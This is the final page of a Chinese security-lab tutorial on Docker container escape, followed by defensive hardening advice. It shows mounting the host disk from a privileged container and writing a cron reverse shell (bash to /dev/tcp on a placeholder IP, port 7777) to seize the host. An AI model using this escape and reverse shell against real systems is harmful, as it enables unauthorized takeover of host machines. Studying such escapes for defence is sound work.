侵權(quán)投訴
訂閱
糾錯(cuò)
加入自媒體

美創(chuàng)安全實(shí)驗(yàn)室 | Docker逃逸原理


同理,新建一個(gè)目錄/test2,將/dev/sda3掛載到新建的目錄下,并查看test2目錄下的內(nèi)容,發(fā)現(xiàn)可以訪問(wèn)宿主機(jī)上/目錄下的內(nèi)容了

image.png


在計(jì)劃任務(wù)里寫入一個(gè)反彈shell:

echo '* * * * * bash -i >& /dev/tcp/x.x.x.x/7777 0>&1'>> /test2/var/spool/cron/root

image.png


在Docker上開(kāi)啟netcat監(jiān)聽(tīng)7777端口,成功接收到宿主主機(jī)的Shell,實(shí)現(xiàn)Docker逃逸。

image.png


Docker逃逸防御

更新Docker版本到19.03.1及更高版本——CVE-2019-14271、覆蓋CVE-2019-5736。

runc版本 >1.0-rc6

k8s 集群版本>1.12

Linux內(nèi)核版本>=2.6.22——CVE-2016-5195(臟牛)

Linux內(nèi)核版本>=4.14——CVE-2017–1000405(大臟牛),未找到docker逃逸利用過(guò)程,但存在逃逸風(fēng)險(xiǎn)。

不建議以root權(quán)限運(yùn)行Docker服務(wù)。

不建議以privileged(特權(quán)模式)啟動(dòng)Docker。

不建議將宿主機(jī)目錄掛載至容器目錄。

不建議將容器以—cap-add=SYSADMIN啟動(dòng),SYSADMIN意為container進(jìn)程允許執(zhí)行mount、umount等一系列系統(tǒng)管理操作,存在容器逃逸風(fēng)險(xiǎn)。

美創(chuàng)科技聚焦數(shù)據(jù)安全,圍繞數(shù)據(jù)安全、災(zāi)難備份、數(shù)據(jù)管理、智能運(yùn)維等多方面挖掘和鑄造數(shù)據(jù)價(jià)值,憑借卓越的產(chǎn)品技術(shù)和服務(wù)贏得了眾多行業(yè)的認(rèn)可和用戶口碑!

<上一頁(yè)  1  2  3  
聲明: 本文由入駐維科號(hào)的作者撰寫,觀點(diǎn)僅代表作者本人,不代表OFweek立場(chǎng)。如有侵權(quán)或其他問(wèn)題,請(qǐng)聯(lián)系舉報(bào)。

發(fā)表評(píng)論

0條評(píng)論,0人參與

請(qǐng)輸入評(píng)論內(nèi)容...

請(qǐng)輸入評(píng)論/評(píng)論長(zhǎng)度6~500個(gè)字

您提交的評(píng)論過(guò)于頻繁,請(qǐng)輸入驗(yàn)證碼繼續(xù)

  • 看不清,點(diǎn)擊換一張  刷新

暫無(wú)評(píng)論

暫無(wú)評(píng)論

安防 獵頭職位 更多
文章糾錯(cuò)
x
*文字標(biāo)題:
*糾錯(cuò)內(nèi)容:
聯(lián)系郵箱:
*驗(yàn) 證 碼:

粵公網(wǎng)安備 44030502002758號(hào)